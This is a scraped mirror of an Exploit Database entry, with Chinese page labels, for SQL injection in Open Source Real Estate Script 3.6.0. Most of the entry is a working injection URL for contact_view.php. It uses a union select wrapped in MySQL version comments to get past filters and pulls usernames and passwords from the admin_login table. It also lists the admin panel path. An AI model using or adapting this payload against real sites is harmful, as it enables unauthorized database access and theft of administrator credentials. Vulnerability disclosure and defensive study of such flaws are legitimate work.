Open Source Real Estate Script 3.6.0 – SQL Injection

• Exploit Database
• 129 阅读

• 作者： Meisam Monsef
  日期： 2016-05-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39868/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

  # Exploit Title: real-estate classified script Sql Injection # Date: 2015-05-29 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: <blockquote class="wp-embedded-content" data-secret="a8q6giYPPU"><a href="https://phpscriptsmall.com/product/open-source-real-estate-script/" target="_blank"rel="external nofollow" class="external" >Open source real-estate script</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Open source real-estate script” — PHP Scripts Mall" src="https://phpscriptsmall.com/product/open-source-real-estate-script/embed/#?secret=a8q6giYPPU" data-secret="a8q6giYPPU" frameborder="0" marginmarginscrolling="no"></iframe> # Version: 3.6.0     Exploit : http://server/[path]/contact_view.php?contact=-99999+[SQl+Command]   Test : http://server/contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23   Admin Panel : http://server/admin/